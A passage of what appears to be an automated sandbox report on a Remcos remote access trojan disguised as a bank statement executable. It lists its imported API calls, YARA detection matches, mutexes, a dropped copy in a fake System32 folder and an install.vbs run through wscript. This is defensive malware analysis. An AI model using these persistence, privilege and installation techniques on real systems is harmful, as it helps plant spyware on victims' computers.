BGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai25_2_0040D2A6
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040D2A67_2_0040D2A6
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 15_2_014E365815_2_014E3658
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 15_2_014E3DC015_2_014E3DC0
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 16_2_019205B216_2_019205B2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 16_2_0192365816_2_01923658
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 16_2_01923DC016_2_01923DC0
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 24_2_010335D024_2_010335D0
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 24_2_01033DC024_2_01033DC0
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040D2A625_2_0040D2A6
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: String function: 00413E72 appears 49 times
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: String function: 0041203B appears 31 times
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: String function: 00413E72 appears 49 times
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: String function: 0041203B appears 31 times
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6880 -s 1496
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: PxxoServicesTrialNet1.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: PxxoServicesTrialNet1.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: PxxoServicesTrialNet1.exe.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeBinary or memory string: OriginalFilename vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.710784907.0000000004374000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUFbf XIv.exe2 vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.716361441.0000000005DC0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.709233026.00000000040C1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.715918875.00000000056E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000000.644631628.0000000000AB2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWABMIG.EXEj% vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701101686.000000000140B000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.717683351.0000000005EB0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.717683351.0000000005EB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000007.00000002.665579232.0000000003200000.00000002.00000001.sdmpBinary or memory string: originalfilename vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000007.00000002.665579232.0000000003200000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000007.00000002.664694836.000000000041D000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameUFbf XIv.exe2 vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000007.00000000.660005236.0000000000AB2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWABMIG.EXEj% vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000007.00000002.665195248.0000000002E50000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs EXTRACTOSERFINANZA989543704031499704092798964.exe
          Source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 25.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 25.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 33.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 33.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 25.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 25.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: PxxoServicesTrialNet1.exe, 0000000F.00000002.765835715.000000000121F000.00000004.00000020.sdmpBinary or memory string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@45/17@5/2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,7_2_0040EC0F
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,25_2_0040EC0F
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00409A2F GetModuleFileNameW,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,CloseHandle,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CloseHandle,??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,wcslen,?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z,??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,CreateMutexA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,CloseHandle,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,7_2_00409A2F
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00409D02 FindResourceA,LoadResource,LockResource,SizeofResource,7_2_00409D02
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00411927 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,7_2_00411927
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeFile created: C:\Users\user\AppData\Roaming\System32Jump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6880
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4928:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1368:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_01
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeMutant created: \Sessions\1\BaseNamedObjects\RemcosX2-Y057I8
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5772
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6648
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeFile created: C:\Users\user\AppData\Local\Temp\install.vbsJump to behavior
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
